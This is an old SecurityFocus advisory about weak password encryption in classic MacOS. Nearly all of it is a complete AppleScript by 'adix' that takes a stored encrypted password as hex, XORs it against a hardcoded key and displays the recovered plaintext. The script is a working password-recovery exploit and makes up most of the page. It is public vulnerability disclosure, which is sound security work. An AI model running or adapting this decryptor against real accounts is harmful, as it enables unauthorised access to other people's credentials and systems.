MacOS Weak Password Encryption Vulnerability

Dawid adix Adamski <adixx@FRIKO4.ONET.PL> wrote an apple script to break passwords.

--------CUT HERE--------
(* MacOS Pass 2.1 by adix 15.06.99; Apple Script English *)
global lbin, bit1, bit2, bitk
set hex1 to text returned of (display dialog "Enter encrypted password
(hex): " default answer "" buttons {" Ok "} default button " Ok " with icon
stop)
set Alicia to
"0111001101110000011000110110011101110100011100000111001001101011"
set pass to ""
set lbin to ""
set razem to ""
set i to 1
set skok to 0
set ile to count items in hex1
if ile = 0 or ile = 1 then
set pass to ""
else
repeat until (i > (ile - 1))
set kodascii to 0
set razem to ""
set zn to items (i) thru (i + 1) in hex1
set lbin to hex2bin(zn)
repeat with a from 1 to 8
set bit1 to item (a + skok) of Alicia
xor(a)
set razem to {razem & bitk} as string
if i < 2 then
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
end if
end repeat
if i < 2 then
set pass to {pass & (ASCII character kodascii)}
else
set zn to items (i - 2) thru (i - 1) in hex1
set lbin to hex2bin(zn)
repeat with a from 1 to 8
set bit1 to item a of razem
xor(a)
set kodascii to {kodascii + bitk * (2 ^ (8 - a))}
end repeat
set pass to {pass & (ASCII character kodascii)}
end if
set skok to skok + 8
set i to i + 2
end repeat
end if
display dialog "Password: " & pass & return & return & "by adix" buttons
{" Ok "} default button " Ok " with icon note
on hex2bin(zn)
set temphex to {"0000", "0001", "0010", "0011", "0100", "0101", "0110",
"0111", "1000", "1001", "1010", "1011", "1100", -
"1101", "1110", "1111"}
set t2hex to "0123456789ABCDEF"
set bin to ""
repeat with j in zn
set t1 to j as string
repeat with i from 1 to (count items in t2hex)
if ((item i in t2hex) = t1) then
set temp to (item i in temphex)
exit repeat
end if
end repeat
set bin to {bin & temp} as string
end repeat
return (bin)
end hex2bin
on xor(a)
set bit2 to item a in lbin
if bit1 = bit2 then
set bitk to "0"
else
set bitk to "1"
end if
end xor


 

Privacy Statement
Copyright 2010, SecurityFocus